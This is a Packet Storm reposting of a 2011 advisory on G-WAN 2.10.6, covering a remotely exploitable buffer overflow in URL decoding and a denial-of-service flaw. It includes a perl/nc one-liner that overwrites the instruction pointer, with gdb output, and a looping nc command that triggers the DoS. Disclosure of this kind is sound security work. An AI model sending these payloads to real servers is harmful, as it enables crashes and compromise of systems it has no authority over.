exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

G-WAN 2.10.6 Buffer Overflow

G-WAN 2.10.6 Buffer Overflow
Posted Oct 17, 2011
Authored by Fredrik Widlund

G-WAN suffers from multiple vulnerabilities. A buffer overflow issue exists in the routine handling URL encoding for the "csp" (so called G-WAN servlets) sub-directory. Exploiting the vulnerability results in remotely being able to execute shellcode on the system. SIGPIPE signals were not handled correctly. Exploiting the vulnerability resulted in denial of service.

tags | advisory, denial of service, overflow, vulnerability, shellcode
SHA-256 | 4f748ec836979bd3edb6ddc3a547daf14847a2b5c909af7c91b8e935ac52e5bb

G-WAN 2.10.6 Buffer Overflow

Change Mirror Download
========================================================================
Title: Multiple G-WAN vulnerabilities

Product: G-WAN (http://gwan.com/)

Author: Fredrik Widlund
E-mail: fredrik.widlund (at) gmail (dot) com

Date: 2011-10-12
========================================================================

1. BACKGROUND

"G-WAN is much smaller, faster and safer than the next best:
- Web servers,
- Web applications servers,
- Web acceleration servers,
- KV stores & noSQL databases." (from gwan.com)

2. DESCRIPTION

Problems exist with design issues, parsing, signal handling, and
buffer management.

A) A buffer overflow issue exists in the routine handling URL encoding
for the "csp" (so called G-WAN servlets) sub-directory. Exploiting the
vulnerability results in remotely being able to execute shellcode on
the system.

B) SIGPIPE signals were not handled correctly. Exploiting the
vulnerability resulted in denial of service.

C) Several minor issues.

3. DETAILS

The vulnerabilities were discovered and successfully exploited on an
Arch Linux 64-bit system running a Linux 3.0.6 kernel with ASLR
enabled.

A)
> perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80
[...]
G-WAN 2.10.6 (pid:9167)
[New LWP 9169]
Program received signal SIGSEGV, Segmentation fault.
[Switching to LWP 9169]
0x41414141 in ?? ()
(gdb) i r
eax            0x31     49
ecx            0x81f2298        136258200
edx            0x0      0
ebx            0x41414141       1094795585
esp            0xf7da51f0       0xf7da51f0
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10202  [ IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

A proof of concept exploit was created brute forcing the ASLR stack
offset which leads to a vulnerable system being compromised remotely
in less than 5 minutes, sending a request each second at the most to
avoid the G-WAN watchdog giving up.

B)
The routines for parsing HTTP 0.9 were broken resulting in a
infinitely looping reply. Repeatedly interrupting such loops will
quickly result in denial of service.

> while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done
[...]
G-WAN 2.10.6 (pid:3948)
[New LWP 3951]
Program received signal SIGPIPE, Broken pipe.
[Switching to LWP 3951]
0xf7ffd430 in __kernel_vsyscall ()

4. AFFECTED VERSIONS

G-WAN 2.10.6 (October 6, 2011).

There is no archive of older versions available and the vendor refuses
to cooperate or acknowledge the issues.

5. SOLUTIONS

The issues seems to be resolved. Upgrade to the latest version.

6. REFERENCES

* http://gwan.com
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance/
* http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance-part-2/

========================================================================
Fredrik Widlund
fredrik.widlund (at) gmail (dot) com
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close